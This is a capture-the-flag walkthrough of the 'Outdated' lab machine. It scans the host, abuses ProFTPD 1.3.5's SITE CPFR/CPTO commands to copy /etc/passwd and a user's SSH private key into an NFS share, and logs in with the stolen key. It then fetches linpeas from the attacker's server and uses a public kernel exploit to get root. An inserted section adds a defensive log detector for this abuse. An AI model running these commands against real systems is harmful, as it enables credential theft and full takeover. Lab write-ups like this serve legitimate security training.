# Outdated

## nmap

```
mkdir nmap
sudo rustscan -a 172.31.1.22 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```

## Enumeration

FTP on port 21 and NFS on port 2049 are open.

<div align="left"><img src="/files/-Mj1GZYHTlbTrk5bsvnz" alt=""></div>

Let's see if there's anything we can mount on NFS

```
showmount -e $ip
```

As you can see, we are allowed to mount `/var/nfsbackups`.

<div align="left"><img src="/files/-Mj1H0jKAAHA4WKR51ld" alt=""></div>

Let's mount that endpoint

```
mkdir /tmp/test_mount
mount -t nfs 172.31.1.22:/var/nfsbackups /tmp/test_mount
```

After mounting, we see three folders, but they appear to be empty.

<div align="left"><img src="/files/-Mj1HmnMsgWlzA9vk46r" alt=""></div>

## Exploitation

If we go back to the nmap scan, we notice that the FTP server is running `ProFTPD 1.3.5`, and a quick search using `searchsploit` shows that it has a file copy vulnerability.

<div align="left"><img src="/files/-Mj1JK4kGg43k5jsvhO4" alt=""></div>

This means we can chain this exploit with the NFS share we have mounted. We can access almost any file we want by copying it to the mount point. First, let's connect to the FTP server using `nc`. I'll copy `/etc/passwd` to the mount point, since we can read the file from there.

```
> $nc 172.31.1.22 21 
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]                                     
> $site cpfr /etc/passwd                                                                                     
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/passwd                                                                                                                                                                   
> 250 Copy successful
```

Looks like we have successfully copied the `passwd` file, and now we can access it.

<div align="left"><img src="/files/-Mj1Myc0DWS6K1BUqJyc" alt=""></div>

Also, we can see that `daniel` is the non-root user. We can copy daniel's SSH key to the mount point, and if there is a private key, we can use it to log in via SSH.

<div align="left"><img src="/files/-Mj1NSQdUpq7PfMbMVgH" alt=""></div>

```
> $nc 172.31.1.22 21 
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]                                     
> $site cpfr /home/daniel/.ssh/id_rsa                                                                                     
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/daniel_id_rsa                                                                                                                                                                   
> 250 Copy successful
```

Let's try to use daniel's private SSH key to log in.

```
# ssh refuses private keys that are readable by group/others
chmod 600 daniel_id_rsa
ssh -i ./daniel_id_rsa daniel@172.31.1.22  
```

We have successfully logged in as daniel. Sweet :D

<div align="left"><img src="/files/-Mj1OvQy645hd-nIBPwO" alt=""></div>
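A defender's view of the chain above, as an added example that is not part of the original write-up: it flags successful `SITE CPFR`/`SITE CPTO` copies that were issued before login, read credential files, or write into an NFS-exported directory. The log format, session ids and sample lines are constructed for illustration; adapt the regex and the path lists to your own ProFTPD logging and exports.

```python
import re

# Constructed FTP control-channel log: "<session> <client_ip> <C|S> <text>".
# The format is hypothetical; adapt the regex to your own ProFTPD LogFormat.
SAMPLE_LOG = """\
s1 10.10.0.41 C SITE CPFR /etc/passwd
s1 10.10.0.41 S 350 File or directory exists, ready for destination name
s1 10.10.0.41 C SITE CPTO /var/nfsbackups/passwd
s1 10.10.0.41 S 250 Copy successful
s2 10.10.0.7 C USER backup
s2 10.10.0.7 S 331 Password required for backup
s2 10.10.0.7 C PASS ****
s2 10.10.0.7 S 230 User backup logged in
s2 10.10.0.7 C SITE CPFR /srv/ftp/report.txt
s2 10.10.0.7 S 350 File or directory exists, ready for destination name
s2 10.10.0.7 C SITE CPTO /srv/ftp/report.bak
s2 10.10.0.7 S 250 Copy successful
"""

LINE = re.compile(r"^(\S+) (\S+) ([CS]) (.*)$")
SENSITIVE_SRC = re.compile(r"^/etc/|/\.ssh/")   # credential material
EXPORTED_DIRS = ("/var/nfsbackups/",)            # directories served over NFS

def find_copy_abuse(log_text):
    """Return one finding per successful SITE CPFR/CPTO copy worth triage."""
    sessions, findings = {}, []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        sid, ip, direction, text = m.groups()
        st = sessions.setdefault(sid, {"auth": False, "src": None, "dst": None})
        if direction == "C":
            verb, _, arg = text.partition(" ")
            if verb.upper() == "SITE":
                sub, _, path = arg.partition(" ")
                if sub.upper() == "CPFR": st["src"] = path
                elif sub.upper() == "CPTO": st["dst"] = path
        elif text.startswith("230"):
            st["auth"] = True                    # login completed
        elif text.startswith("250") and st["src"] and st["dst"]:
            reasons = []
            if not st["auth"]: reasons.append("unauthenticated")
            if SENSITIVE_SRC.search(st["src"]): reasons.append("sensitive-source")
            if st["dst"].startswith(EXPORTED_DIRS): reasons.append("dest-in-nfs-export")
            if reasons:
                findings.append((sid, ip, st["src"], st["dst"], reasons))
            st["src"] = st["dst"] = None
    return findings
```

Running `find_copy_abuse(SAMPLE_LOG)` reports only session `s1`; the authenticated copy inside the FTP root in `s2` raises nothing.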

## Post Exploitation

First, let's transfer `linpeas.sh`.

```
(base) [psdon@arch outdated]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
```

You can find your machine's IP address by executing the following.

```
(base) [psdon@arch outdated]$ ip a | grep tun                                                         
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 10.10.0.41/24 scope global tun0                                                              
```

Then transfer the script using `wget`

```
daniel@outdated:~$ wget http://10.10.0.41/linpeas.sh                                                                                                                                                                 
--2021-09-07 14:38:02--  http://10.10.0.41/linpeas.sh                                                                                                                                                                
Connecting to 10.10.0.41:80... connected.                                                                                                                                                                            
HTTP request sent, awaiting response... 200 OK                                                                                                                                                                       
Length: 458110 (447K) [application/x-sh]                                                                                                                                                                             
Saving to: `linpeas.sh'                                                                                                                                                                                              
                                                                                                                                                                                                                     
100%[===========================================================================================================================================================================>] 458,110      335K/s   in 1.3s     
                                                                                                                                                                                                                     
2021-09-07 14:38:04 (335 KB/s) - `linpeas.sh' saved [458110/458110]                                                                                                                                                  
                                                                                                                                                                                                                     
daniel@outdated:~$ chmod +x linpeas.sh
```

And now we can run `linpeas.sh`

```
daniel@outdated:~$ ./linpeas.sh                                                                                                                                                                                      
                                                                                                                                                                                                                     
                                                                                                                                                                                                                     
```

Right off the bat, you will notice the kernel version is `3.13.0-32-generic`.

<div align="left"><img src="/files/-Mj1QiylIZQ963wP7JIn" alt=""></div>

I found out that this kernel version is vulnerable, which can lead to privilege escalation. We can also compile the exploit on the target, since `gcc` is installed there.

<div align="left"><img src="/files/-Mj1R91SZbCTl0iI1U4_" alt=""></div>

## Privilege Escalation

First, mirror the exploit to our local machine and transfer it to the target machine.

```
searchsploit -m linux/local/37292.c
mv 37292.c exploit.c
```

<div align="left"><img src="/files/-Mj1Rlt6J_l0F1vO2O_8" alt=""></div>

Compile the exploit, and enjoy your root privilege :D

<div align="left"><img src="/files/-Mj1S4CK3-e1-4q8kAqh" alt=""></div>


